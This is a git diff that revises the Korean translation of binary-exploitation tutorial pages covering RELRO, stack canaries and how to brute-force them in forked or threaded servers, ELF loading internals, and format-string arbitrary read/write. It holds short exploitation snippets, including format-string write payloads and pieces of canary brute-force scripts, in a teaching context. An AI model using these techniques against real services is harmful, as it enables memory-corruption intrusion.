+이 예제에서는 모든 코드를 찾는 데 **1바이트 반만 필요**하다는 것을 볼 수 있으며, 이 경우 기본 주소는 **유출된 RIP에 "000"으로 끝나는** 것입니다. 예를 들어, `0x562002970ecf`가 유출되었다면 기본 주소는 `0x562002970000`입니다.
 ```python
 elf.address = RIP - (RIP & 0xfff)
 ```
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/relro.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/relro.md
index f33c9d434..e29ff6fd5 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/relro.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/relro.md
@@ -4,7 +4,7 @@
 
 ## Relro
 
-**RELRO**는 **Relocation Read-Only**의 약자로, **GOT (Global Offset Table)** 오버라이트와 관련된 위험을 완화하기 위해 바이너리에서 사용되는 보안 기능입니다. 개념을 명확하게 하기 위해 두 가지 유형으로 나누어 보겠습니다: **Partial RELRO**와 **Full RELRO**.
+**RELRO**는 **Relocation Read-Only**의 약자로, **GOT (Global Offset Table)** 오버라이트와 관련된 위험을 완화하기 위해 바이너리에서 사용되는 보안 기능입니다. 개념을 명확히 하기 위해 두 가지 유형으로 나누어 보겠습니다: **Partial RELRO**와 **Full RELRO**.
 
 ### **Partial RELRO**
 
@@ -18,14 +18,14 @@
 
 그러나 Full RELRO의 단점은 성능과 시작 시간 측면에서 발생합니다. GOT를 읽기 전용으로 표시하기 전에 모든 동적 기호를 시작 시 해결해야 하므로, **Full RELRO가 활성화된 바이너리는 로드 시간이 더 길어질 수 있습니다.** 이 추가 시작 오버헤드 때문에 Full RELRO는 모든 바이너리에서 기본적으로 활성화되어 있지 않습니다.
 
-바이너리에서 Full RELRO가 활성화되어 있는지 확인할 수 있는 방법이 있습니다:
+바이너리에서 Full RELRO가 활성화되어 있는지 확인할 수 있는 방법은:
 ```bash
 readelf -l /proc/ID_PROC/exe | grep BIND_NOW
 ```
-## Bypass
+## 우회
 
 Full RELRO가 활성화되어 있으면, 임의 실행을 얻기 위해 GOT 테이블에 쓰지 않는 다른 방법을 찾아야만 우회할 수 있습니다.
 
-LIBC의 GOT는 일반적으로 Partial RELRO이므로, 임의 쓰기로 수정할 수 있습니다. 자세한 내용은 [Targetting libc GOT entries](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries)를 참조하세요.
+LIBC의 GOT는 일반적으로 Partial RELRO이므로, 임의 쓰기로 수정할 수 있습니다. 자세한 내용은 [Targetting libc GOT entries](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries)에서 확인하세요.
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/README.md
index c5b6f9d0e..9c0d885fb 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/README.md
@@ -2,34 +2,34 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## **StackGuard와 StackShield**
+## **스택가드와 스택쉴드**
 
-**StackGuard**는 **EIP (Extended Instruction Pointer)** 앞에 **카나리**로 알려진 특별한 값을 삽입합니다. 이 값은 `0x000aff0d`로, null, newline, EOF, carriage return을 나타내어 버퍼 오버플로우로부터 보호합니다. 그러나 `recv()`, `memcpy()`, `read()`, `bcopy()`와 같은 함수는 여전히 취약하며, **EBP (Base Pointer)**를 보호하지 않습니다.
+**스택가드**는 **EIP (확장 명령 포인터)** 앞에 **카나리**로 알려진 특별한 값을 삽입합니다. 이 값은 `0x000aff0d`로, 널, 줄 바꿈, EOF, 캐리지 리턴을 나타내어 버퍼 오버플로우로부터 보호합니다. 그러나 `recv()`, `memcpy()`, `read()`, `bcopy()`와 같은 함수는 여전히 취약하며, **EBP (기본 포인터)**를 보호하지 않습니다.
 
-**StackShield**는 **Global Return Stack**을 유지하여 모든 반환 주소(**EIPs**)를 저장함으로써 StackGuard보다 더 정교한 접근 방식을 취합니다. 이 설정은 오버플로우가 발생하더라도 해를 끼치지 않도록 하며, 저장된 주소와 실제 반환 주소를 비교하여 오버플로우 발생을 감지할 수 있습니다. 또한 StackShield는 반환 주소를 경계 값과 비교하여 **EIP**가 예상 데이터 공간 외부를 가리키는지 감지할 수 있습니다. 그러나 이 보호는 Return-to-libc, ROP (Return-Oriented Programming) 또는 ret2ret와 같은 기술을 통해 우회될 수 있어 StackShield가 지역 변수를 보호하지 않음을 나타냅니다.
+**스택쉴드**는 **글로벌 리턴 스택**을 유지하여 모든 리턴 주소(**EIP**)를 저장함으로써 스택가드보다 더 정교한 접근 방식을 취합니다. 이 설정은 오버플로우가 발생하더라도 해를 끼치지 않도록 하며, 저장된 주소와 실제 리턴 주소를 비교하여 오버플로우 발생을 감지할 수 있습니다. 또한, 스택쉴드는 리턴 주소를 경계 값과 비교하여 **EIP**가 예상 데이터 공간 외부를 가리키는지 감지할 수 있습니다. 그러나 이 보호는 Return-to-libc, ROP (리턴 지향 프로그래밍) 또는 ret2ret와 같은 기술을 통해 우회될 수 있어, 스택쉴드도 지역 변수를 보호하지 않습니다.
 
 ## **스택 스매시 프로텍터 (ProPolice) `-fstack-protector`:**
 
-이 메커니즘은 **EBP** 앞에 **카나리**를 배치하고, 지역 변수를 재조직하여 버퍼를 더 높은 메모리 주소에 위치시켜 다른 변수를 덮어쓰지 않도록 합니다. 또한 지역 변수 위에 스택에서 전달된 인수를 안전하게 복사하고 이 복사본을 인수로 사용합니다. 그러나 8개 미만의 요소를 가진 배열이나 사용자의 구조 내의 버퍼는 보호하지 않습니다.
+이 메커니즘은 **EBP** 앞에 **카나리**를 배치하고, 지역 변수를 재조직하여 버퍼를 더 높은 메모리 주소에 위치시켜 다른 변수를 덮어쓰지 않도록 합니다. 또한, 지역 변수 위의 스택에서 전달된 인수를 안전하게 복사하고 이 복사본을 인수로 사용합니다. 그러나 8개 미만의 요소를 가진 배열이나 사용자의 구조 내의 버퍼는 보호하지 않습니다.
 
-**카나리**는 `/dev/urandom`에서 파생된 임의의 숫자이거나 기본값 `0xff0a0000`입니다. 이는 **TLS (Thread Local Storage)**에 저장되어 스레드 간에 공유 메모리 공간이 스레드별 전역 또는 정적 변수를 가질 수 있도록 합니다. 이러한 변수는 처음에 부모 프로세스에서 복사되며, 자식 프로세스는 부모나 형제에게 영향을 주지 않고 데이터를 변경할 수 있습니다. 그러나 **`fork()`를 사용하여 새로운 카나리를 생성하지 않으면 모든 프로세스(부모 및 자식)가 동일한 카나리를 공유하게 되어 취약해집니다.** **i386** 아키텍처에서는 카나리가 `gs:0x14`에 저장되고, **x86_64**에서는 `fs:0x28`에 저장됩니다.
+**카나리**는 `/dev/urandom`에서 파생된 임의의 숫자이거나 기본값 `0xff0a0000`입니다. 이는 **TLS (스레드 로컬 저장소)**에 저장되어, 스레드 간에 공유 메모리 공간이 스레드별 글로벌 또는 정적 변수를 가질 수 있도록 합니다. 이러한 변수는 처음에 부모 프로세스에서 복사되며, 자식 프로세스는 부모나 형제에게 영향을 주지 않고 데이터를 변경할 수 있습니다. 그럼에도 불구하고 **`fork()`가 새로운 카나리를 생성하지 않고 사용되면, 모든 프로세스(부모 및 자식)가 동일한 카나리를 공유하게 되어 취약해집니다.** **i386** 아키텍처에서는 카나리가 `gs:0x14`에 저장되고, **x86_64**에서는 `fs:0x28`에 저장됩니다.
 
-이 지역 보호는 공격에 취약한 버퍼가 있는 함수를 식별하고 이러한 함수의 시작 부분에 카나리를 배치하기 위해 코드를 주입하며, 끝 부분에서 그 무결성을 확인합니다.
+이 지역 보호는 공격에 취약한 버퍼가 있는 함수를 식별하고, 이러한 함수의 시작 부분에 카나리를 배치하기 위해 코드를 주입하며, 끝 부분에서 그 무결성을 확인합니다.
 
-웹 서버가 `fork()`를 사용할 때, 카나리 바이트를 하나씩 추측하는 무차별 대입 공격을 가능하게 합니다. 그러나 `fork()` 후에 `execve()`를 사용하면 메모리 공간이 덮어쓰여져 공격이 무효화됩니다. `vfork()`는 자식 프로세스가 쓰기를 시도할 때까지 복제를 하지 않고 실행할 수 있게 하여 프로세스 생성 및 메모리 처리에 대한 다른 접근 방식을 제공합니다.
+웹 서버가 `fork()`를 사용할 때, 카나리 바이트를 하나씩 추측하는 무차별 대입 공격을 가능하게 합니다. 그러나 `fork()` 후에 `execve()`를 사용하면 메모리 공간이 덮어쓰여져 공격이 무효화됩니다. `vfork()`는 자식 프로세스가 쓰기를 시도할 때까지 복제를 하지 않고 실행할 수 있게 하여, 프로세스 생성 및 메모리 처리에 대한 다른 접근 방식을 제공합니다.
 
 ### 길이
 
-`x64` 바이너리에서 카나리 쿠키는 **`0x8`** 바이트 쿼드워드입니다. **첫 번째 7바이트는 임의의 값**이고 마지막 바이트는 **null 바이트**입니다.
+`x64` 바이너리에서 카나리 쿠키는 **`0x8`** 바이트 쿼드워드입니다. **첫 7바이트는 임의의 값**이고 마지막 바이트는 **널 바이트**입니다.
 
-`x86` 바이너리에서 카나리 쿠키는 **`0x4`** 바이트 더블워드입니다. **첫 번째 3바이트는 임의의 값**이고 마지막 바이트는 **null 바이트**입니다.
+`x86` 바이너리에서 카나리 쿠키는 **`0x4`** 바이트 더블워드입니다. **첫 3바이트는 임의의 값**이고 마지막 바이트는 **널 바이트**입니다.
 
 > [!CAUTION]
-> 두 카나리의 가장 낮은 유효 바이트는 null 바이트입니다. 이는 스택에서 낮은 주소에서 오는 첫 번째 바이트이기 때문에 **문자열을 읽는 함수는 이를 읽기 전에 멈출 것입니다.**
+> 두 카나리의 최하위 바이트는 널 바이트입니다. 이는 스택에서 낮은 주소에서 오는 첫 번째 바이트이기 때문에 **문자열을 읽는 함수는 이를 읽기 전에 멈출 것입니다.**
 
 ## 우회 방법
 
-**카나리를 유출한 후** 자신의 값으로 덮어쓰기(예: 버퍼 오버플로우).
+**카나리를 유출한 후** 이를 자신의 값으로 덮어쓰는 것(예: 버퍼 오버플로우).
 
 - **자식 프로세스에서 카나리가 포크되면** 한 바이트씩 **무차별 대입**이 가능할 수 있습니다:
 
@@ -37,7 +37,7 @@
 bf-forked-stack-canaries.md
 {{#endref}}
 
-- 바이너리에 흥미로운 **유출 또는 임의 읽기 취약점**이 있다면 유출할 수 있습니다:
+- 바이너리에 흥미로운 **유출 또는 임의 읽기 취약점**이 있다면 이를 유출할 수 있습니다:
 
 {{#ref}}
 print-stack-canary.md
@@ -53,7 +53,7 @@ print-stack-canary.md
 
 - **마스터 및 스레드 카나리 모두 수정하기**
 
-카나리로 보호된 스레드 함수에서의 버퍼 오버플로우는 스레드의 마스터 카나리를 수정하는 데 사용될 수 있습니다. 결과적으로, 두 개의 동일한 카나리(수정되었지만)가 사용되기 때문에 완화 조치는 무용지물이 됩니다.
+카나리로 보호된 스레드 함수에서의 버퍼 오버플로우는 스레드의 마스터 카나리를 수정하는 데 사용될 수 있습니다. 결과적으로, 두 개의 동일한(수정된) 카나리를 사용하여 검사를 수행하므로 완화가 무용지물이 됩니다.
 
 - **`__stack_chk_fail`의 GOT 항목 수정하기**
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
index 387512e4f..72a16d09c 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
@@ -1,24 +1,24 @@
-# BF 포크 및 스레드 스택 카나리
+# BF Forked & Threaded Stack Canaries
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-**카나리와 PIE(위치 독립 실행 파일)로 보호된 바이너리에 직면한 경우, 이를 우회할 방법을 찾아야 할 것입니다.**
+**당신이 canary와 PIE (Position Independent Executable)로 보호된 바이너리에 직면해 있다면, 이를 우회할 방법을 찾아야 할 것입니다.**
 
 ![](<../../../../images/image (144).png>)
 
 > [!NOTE]
-> **`checksec`**가 바이너리가 카나리로 보호되고 있음을 찾지 못할 수 있습니다. 이는 정적으로 컴파일되었고 함수를 식별할 수 없기 때문입니다.\
-> 그러나 함수 호출 시작 시 스택에 값이 저장되고 이 값이 종료 전에 확인되는 것을 발견하면 수동으로 이를 알 수 있습니다.
+> **`checksec`**가 바이너리가 canary로 보호되고 있음을 찾지 못할 수 있다는 점에 유의하세요. 이는 정적으로 컴파일되었고 함수를 식별할 수 없기 때문입니다.\
+> 그러나 함수 호출의 시작 부분에서 스택에 값이 저장되고 이 값이 종료 전에 확인되는 것을 발견하면 수동으로 이를 알 수 있습니다.
 
-## 브루트 포스 카나리
+## Brute force Canary
 
-간단한 카나리를 우회하는 가장 좋은 방법은 바이너리가 **새 연결을 설정할 때마다 자식 프로세스를 포크하는 프로그램**인 경우입니다(네트워크 서비스). 왜냐하면 연결할 때마다 **같은 카나리가 사용되기 때문입니다.**
+간단한 canary를 우회하는 가장 좋은 방법은 바이너리가 **새로운 연결을 설정할 때마다 자식 프로세스를 포크하는 프로그램**인 경우입니다 (네트워크 서비스). 왜냐하면 연결할 때마다 **같은 canary가 사용되기 때문입니다.**
 
-따라서 카나리를 우회하는 가장 좋은 방법은 **문자별로 브루트 포스**하는 것이며, 추측한 카나리 바이트가 올바른지 확인하기 위해 프로그램이 충돌했는지 아니면 정상 흐름을 계속하는지를 확인할 수 있습니다. 이 예제에서 함수는 **8바이트 카나리(x64)**를 브루트 포스하며, 올바르게 추측한 바이트와 잘못된 바이트를 **응답**이 서버에 의해 반환되는지를 **확인**하여 구별합니다(다른 상황에서는 **try/except**를 사용할 수 있습니다):
+따라서 canary를 우회하는 가장 좋은 방법은 **문자 하나씩 brute-force하는 것**이며, 추측한 canary 바이트가 올바른지 확인하기 위해 프로그램이 충돌했는지 아니면 정상적인 흐름을 계속하는지를 확인할 수 있습니다. 이 예제에서 함수는 **8 바이트 canary (x64)**를 brute-force하며, 올바르게 추측한 바이트와 잘못된 바이트를 **응답**이 서버에 의해 반환되는지를 **확인**하여 구별합니다 (다른 상황에서는 **try/except**를 사용할 수 있습니다):
 
-### 예제 1
+### Example 1
 
-이 예제는 64비트로 구현되었지만 32비트로 쉽게 구현될 수 있습니다.
+이 예제는 64비트로 구현되었지만 32비트로도 쉽게 구현될 수 있습니다.
 ```python
 from pwn import *
 
@@ -60,7 +60,7 @@ CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary
 ### 예제 2
 
 이것은 32비트에 대해 구현되었지만, 64비트로 쉽게 변경할 수 있습니다.\
-또한 이 예제에서는 **프로그램이 입력의 크기를 나타내는 바이트와 페이로드를 먼저 기대한다는 점에 유의하십시오.**
+또한 이 예제에서는 **프로그램이 입력의 크기를 나타내는 바이트와 페이로드를 먼저 기대한다는 점에 유의하세요.**
 ```python
 from pwn import *
 
@@ -103,9 +103,9 @@ log.info(f"The canary is: {canary}")
 ```
 ## 스레드
 
-같은 프로세스의 스레드는 **같은 카나리 토큰을 공유**하므로, 이진 파일이 공격이 발생할 때마다 새로운 스레드를 생성하면 카나리를 **브루트 포스**할 수 있습니다.&#x20;
+같은 프로세스의 스레드는 **같은 카나리 토큰을 공유**하므로, 이진 파일이 공격이 발생할 때마다 새로운 스레드를 생성하면 카나리를 **무차별 대입**할 수 있습니다.&#x20;
 
-카나리로 보호된 스레드 함수에서의 버퍼 오버플로우는 프로세스의 마스터 카나리를 수정하는 데 사용될 수 있습니다. 결과적으로, 완화 조치는 두 개의 카나리가 동일하게(수정되었지만) 사용되기 때문에 무용지물이 됩니다.
+카나리로 보호된 스레드 함수에서의 버퍼 오버플로우는 프로세스의 마스터 카나리를 수정하는 데 사용될 수 있습니다. 결과적으로, 완화 조치는 무의미해지며, 체크는 동일한 두 개의 카나리(수정되었지만)를 사용하기 때문입니다.
 
 ### 예시
 
@@ -213,6 +213,6 @@ io.interactive()
 ## 다른 예제 및 참고자료
 
 - [https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html)
-- 64비트, PIE 없음, nx, BF 카나리, 메모리에 ROP를 작성하여 `execve`를 호출하고 그곳으로 점프합니다.
+- 64비트, PIE 없음, nx, BF 카나리, `execve`를 호출하고 그곳으로 점프하는 ROP를 메모리에 작성.
 - [http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads](http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads)
 - 64비트, PIE 없음, nx, 스레드 및 마스터 카나리 수정.
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/elf-tricks.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/elf-tricks.md
index 3962fbac6..6a8688749 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/elf-tricks.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/elf-tricks.md
@@ -52,7 +52,7 @@ Segment Sections...
 이 헤더는 **이진 파일을 메모리에 로드하는 방법**을 나타내는 데 사용됩니다.\
 각 **LOAD** 헤더는 **메모리**의 영역(크기, 권한 및 정렬)을 나타내고, 그곳에 복사할 ELF **이진 파일의 바이트**를 나타냅니다.
 
-예를 들어, 두 번째 헤더는 크기가 0x1190이며, 0x1fc48에 위치해야 하고, 읽기 및 쓰기 권한을 가지며, 오프셋 0xfc48에서 0x528로 채워집니다(예약된 모든 공간을 채우지 않습니다). 이 메모리에는 섹션 `.init_array .fini_array .dynamic .got .data .bss`가 포함됩니다.
+예를 들어, 두 번째 헤더는 크기가 0x1190이며, 0x1fc48에 위치해야 하고, 읽기 및 쓰기 권한을 가지며, 오프셋 0xfc48에서 0x528로 채워집니다(모든 예약된 공간을 채우지 않음). 이 메모리에는 섹션 `.init_array .fini_array .dynamic .got .data .bss`가 포함됩니다.
 
 ### DYNAMIC
 
@@ -76,7 +76,7 @@ Segment Sections...
 
 이전 예제에서는 0x3b8 바이트를 0x1fc48에 읽기 전용으로 복사하여 섹션 `.init_array .fini_array .dynamic .got .data .bss`에 영향을 미칩니다.
 
-RELRO는 부분적 또는 전체적일 수 있으며, 부분 버전은 **지연 바인딩**에 사용되는 섹션 **`.plt.got`**를 보호하지 않으며, 라이브러리의 위치를 처음 검색할 때 주소를 기록하기 위해 이 메모리 공간에 **쓰기 권한**이 필요합니다.
+RELRO는 부분적이거나 전체적일 수 있으며, 부분 버전은 **지연 바인딩**에 사용되는 **`.plt.got`** 섹션을 보호하지 않으며, 라이브러리의 위치를 처음 검색할 때 주소를 기록하기 위해 이 메모리 공간에 **쓰기 권한**이 필요합니다.
 
 ### TLS
 
@@ -308,9 +308,9 @@ Offset          Info           Type           Sym. Value    Sym. Name + Addend
 ```
 ### 정적 재배치
 
-프로그램이 **선호하는 주소**(보통 0x400000)와 다른 위치에 로드되면(주소가 이미 사용 중이거나 **ASLR** 또는 기타 이유로), 정적 재배치가 **포인터를 수정**하여 이진 파일이 선호하는 주소에 로드될 것으로 예상했던 값을 수정합니다.
+프로그램이 **선호하는 주소**(보통 0x400000)와 다른 위치에 로드되면(주소가 이미 사용 중이거나 **ASLR** 또는 기타 이유로), 정적 재배치는 선호하는 주소에 바이너리가 로드될 것으로 예상했던 값을 가진 포인터를 **수정**합니다.
 
-예를 들어, `R_AARCH64_RELATIV` 유형의 섹션은 재배치 편향에 추가 값(addend value)을 더한 주소를 수정해야 합니다.
+예를 들어, `R_AARCH64_RELATIV` 유형의 섹션은 재배치 편향에 주소를 수정하고 추가 값(addend value)을 더해야 합니다.
 
 ### 동적 재배치 및 GOT
 
@@ -324,7 +324,7 @@ PLT 섹션은 지연 바인딩을 수행할 수 있게 해주며, 이는 함수
 
 ## 프로그램 초기화
 
-프로그램이 로드된 후 실행할 시간입니다. 그러나 실행되는 첫 번째 코드는 **항상 `main`** 함수가 아닙니다. 예를 들어 C++에서 **전역 변수가 클래스의 객체인 경우**, 이 객체는 main이 실행되기 **전에** **초기화**되어야 합니다.
+프로그램이 로드된 후 실행할 시간입니다. 그러나 실행되는 첫 번째 코드는 항상 `main` 함수가 아닙니다. 예를 들어 C++에서 **전역 변수가 클래스의 객체**인 경우, 이 객체는 main이 실행되기 **전에** **초기화**되어야 합니다.
 ```cpp
 #include <stdio.h>
 // g++ autoinit.cpp -o autoinit
@@ -345,14 +345,14 @@ printf("Main\n");
 return 0;
 }
 ```
-이러한 전역 변수는 `.data` 또는 `.bss`에 위치하지만, `__CTOR_LIST__` 및 `__DTOR_LIST__` 목록에는 초기화 및 소멸할 객체가 저장되어 이들을 추적할 수 있습니다.
+이 전역 변수들은 `.data` 또는 `.bss`에 위치하지만, `__CTOR_LIST__`와 `__DTOR_LIST__` 목록에는 초기화 및 소멸할 객체들이 저장되어 이들을 추적할 수 있습니다.
 
 C 코드에서는 GNU 확장을 사용하여 동일한 결과를 얻을 수 있습니다:
 ```c
 __attributte__((constructor)) //Add a constructor to execute before
 __attributte__((destructor)) //Add to the destructor list
 ```
-컴파일러 관점에서, `main` 함수가 실행되기 전과 후에 이러한 작업을 실행하기 위해 `init` 함수와 `fini` 함수를 생성할 수 있으며, 이는 동적 섹션에서 **`INIT`** 및 **`FIN`**으로 참조됩니다. 이들은 ELF의 `init` 및 `fini` 섹션에 배치됩니다.
+컴파일러 관점에서, `main` 함수가 실행되기 전과 후에 이러한 작업을 실행하기 위해 `init` 함수와 `fini` 함수를 생성할 수 있으며, 이는 동적 섹션에서 **`INIT`** 및 **`FIN`**으로 참조됩니다. 그리고 ELF의 `init` 및 `fini` 섹션에 배치됩니다.
 
 언급된 다른 옵션은 동적 섹션의 **`INIT_ARRAY`** 및 **`FINI_ARRAY`** 항목에서 **`__CTOR_LIST__`** 및 **`__DTOR_LIST__`** 목록을 참조하는 것입니다. 이들의 길이는 **`INIT_ARRAYSZ`** 및 **`FINI_ARRAYSZ`**로 표시됩니다. 각 항목은 인수 없이 호출될 함수 포인터입니다.
 
@@ -361,7 +361,7 @@ __attributte__((destructor)) //Add to the destructor list
 ### 초기화 순서
 
 1. 프로그램이 메모리에 로드되고, 정적 전역 변수가 **`.data`**에서 초기화되며, 초기화되지 않은 변수는 **`.bss`**에서 0으로 설정됩니다.
-2. 프로그램 또는 라이브러리의 모든 **의존성**이 **초기화**되고 **동적 링크**가 실행됩니다.
+2. 프로그램 또는 라이브러리에 대한 모든 **종속성**이 **초기화**되고 동적 링크가 실행됩니다.
 3. **`PREINIT_ARRAY`** 함수가 실행됩니다.
 4. **`INIT_ARRAY`** 함수가 실행됩니다.
 5. **`INIT`** 항목이 있으면 호출됩니다.
@@ -369,11 +369,11 @@ __attributte__((destructor)) //Add to the destructor list
 
 ## 스레드 로컬 저장소 (TLS)
 
-C++에서 **`__thread_local`** 키워드를 사용하거나 GNU 확장 **`__thread`**를 사용하여 정의됩니다.
+C++에서 **`__thread_local`** 키워드 또는 GNU 확장 **`__thread`**를 사용하여 정의됩니다.
 
 각 스레드는 이 변수에 대해 고유한 위치를 유지하므로 오직 해당 스레드만 자신의 변수를 접근할 수 있습니다.
 
-이것이 사용될 때, ELF에서는 **`.tdata`** 및 **`.tbss`** 섹션이 사용됩니다. 이는 TLS를 위한 `.data` (초기화됨) 및 `.bss` (초기화되지 않음)와 유사합니다.
+이것이 사용될 때, ELF에서 **`.tdata`** 및 **`.tbss`** 섹션이 사용됩니다. 이는 TLS에 대한 `.data` (초기화됨) 및 `.bss` (초기화되지 않음)와 유사합니다.
 
 각 변수는 TLS 헤더에 항목을 가지며, 여기에는 크기와 TLS 오프셋이 지정됩니다. 이는 스레드의 로컬 데이터 영역에서 사용할 오프셋입니다.
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md
index c77c96701..81fe0c940 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md
@@ -4,9 +4,9 @@
 
 ## Basic Information
 
-C에서 **`printf`**는 **문자열**을 **출력**하는 데 사용할 수 있는 함수입니다. 이 함수가 기대하는 **첫 번째 매개변수**는 **형식 지정자가 포함된 원시 텍스트**입니다. **다음 매개변수**는 원시 텍스트의 **형식 지정자**를 **대체**할 **값**입니다.
+C에서 **`printf`**는 문자열을 **출력**하는 데 사용할 수 있는 함수입니다. 이 함수가 기대하는 **첫 번째 매개변수**는 **형식 지정자가 포함된 원시 텍스트**입니다. **다음 매개변수**는 원시 텍스트의 **형식 지정자**를 **대체**할 **값**입니다.
 
-취약점은 **공격자 텍스트가 이 함수의 첫 번째 인수로 사용될 때** 나타납니다. 공격자는 **printf 형식** 문자열 기능을 악용하여 **특별한 입력**을 만들어 **읽을 수 있는/쓸 수 있는** 모든 주소에서 **데이터를 읽고 쓸 수** 있습니다. 이렇게 해서 **임의의 코드를 실행**할 수 있습니다.
+취약점은 **공격자 텍스트가 이 함수의 첫 번째 인수로 사용될 때** 나타납니다. 공격자는 **printf 형식** 문자열 기능을 악용하여 **특별한 입력을 조작**하여 **읽을 수 있는/쓸 수 있는** 모든 주소에서 **데이터를 읽고 쓸 수** 있습니다. 이렇게 해서 **임의 코드를 실행**할 수 있습니다.
 
 #### Formatters:
 ```bash
@@ -37,11 +37,11 @@ printf("%x %x %x", value);  // Unexpected output: reads random values from the s
 ```
 ### **포인터 접근하기**
 
-형식 **`%<n>$x`**에서 `n`은 숫자로, printf에 스택에서 n번째 매개변수를 선택하도록 지시합니다. 따라서 printf를 사용하여 스택에서 4번째 매개변수를 읽고 싶다면 다음과 같이 할 수 있습니다:
+형식 **`%<n>$x`**에서 `n`은 숫자로, printf에게 스택에서 n번째 매개변수를 선택하도록 지시합니다. 따라서 printf를 사용하여 스택에서 4번째 매개변수를 읽고 싶다면 다음과 같이 할 수 있습니다:
 ```c
 printf("%x %x %x %x")
 ```
-첫 번째부터 네 번째 매개변수까지 읽을 수 있습니다.
+첫 번째부터 네 번째 매개변수를 읽을 수 있습니다.
 
 또는 다음과 같이 할 수 있습니다:
 ```c
@@ -49,7 +49,7 @@ printf("$4%x")
 ```
 그리고 네 번째를 직접 읽습니다.
 
-공격자가 `pr`**`intf` 매개변수를 제어한다는 점에 유의하세요. 이는 기본적으로** 그의 입력이 `printf`가 호출될 때 스택에 있을 것임을 의미하며, 이는 그가 스택에 특정 메모리 주소를 쓸 수 있음을 의미합니다.
+공격자가 `pr`**`intf` 매개변수를 제어한다는 점에 유의하세요. 이는 기본적으로** 그의 입력이 `printf`가 호출될 때 스택에 존재하게 된다는 것을 의미하며, 이는 그가 스택에 특정 메모리 주소를 쓸 수 있음을 의미합니다.
 
 > [!CAUTION]
 > 이 입력을 제어하는 공격자는 **스택에 임의의 주소를 추가하고 `printf`가 이를 접근하게 만들 수 있습니다**. 다음 섹션에서는 이 동작을 사용하는 방법에 대해 설명합니다.
@@ -74,16 +74,16 @@ log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'
 
 ## **임의 쓰기**
 
-포맷터 **`$<num>%n`**은 **스택의 \<num> 매개변수에 지정된 주소**에 **쓰기 바이트 수**를 **기록**합니다. 공격자가 printf를 사용하여 원하는 만큼의 문자를 쓸 수 있다면, 그는 **`$<num>%n`**을 사용하여 임의의 주소에 임의의 숫자를 쓸 수 있게 됩니다.
+포맷터 **`$<num>%n`**은 스택의 \<num> 매개변수에 **지정된 주소**에 **쓰기 바이트 수**를 **작성**합니다. 공격자가 printf를 사용하여 원하는 만큼의 문자를 쓸 수 있다면, 그는 **`$<num>%n`**을 사용하여 임의의 주소에 임의의 숫자를 쓸 수 있게 됩니다.
 
 다행히도, 숫자 9999를 쓰기 위해 입력에 9999개의 "A"를 추가할 필요는 없습니다. 그렇게 하기 위해 포맷터 **`%.<num-write>%<num>$n`**을 사용하여 **`<num-write>`** 숫자를 **`num` 위치가 가리키는 주소**에 쓸 수 있습니다.
 ```bash
 AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
 AAAA.%500\$08x —> Param at offset 500
 ```
-그러나 일반적으로 `0x08049724`와 같은 주소를 작성하기 위해 (한 번에 작성하기에는 엄청난 숫자입니다), **`$hn`**이 **`$n`** 대신 사용됩니다. 이렇게 하면 **2바이트만 작성**할 수 있습니다. 따라서 이 작업은 주소의 가장 높은 2바이트와 가장 낮은 2바이트에 대해 각각 두 번 수행됩니다.
+그러나 일반적으로 `0x08049724`와 같은 주소를 작성하기 위해 (한 번에 작성하기에는 큰 숫자임) **`$hn`**이 **`$n`** 대신 사용된다는 점에 유의해야 합니다. 이렇게 하면 **2바이트만 작성**할 수 있습니다. 따라서 이 작업은 주소의 가장 높은 2바이트와 가장 낮은 2바이트에 대해 각각 두 번 수행됩니다.
 
-따라서 이 취약점은 **임의의 주소에 무엇이든 쓸 수 있게** 합니다 (임의 쓰기).
+따라서 이 취약점은 **임의의 주소에 무엇이든 쓸 수 있게** 합니다.
 
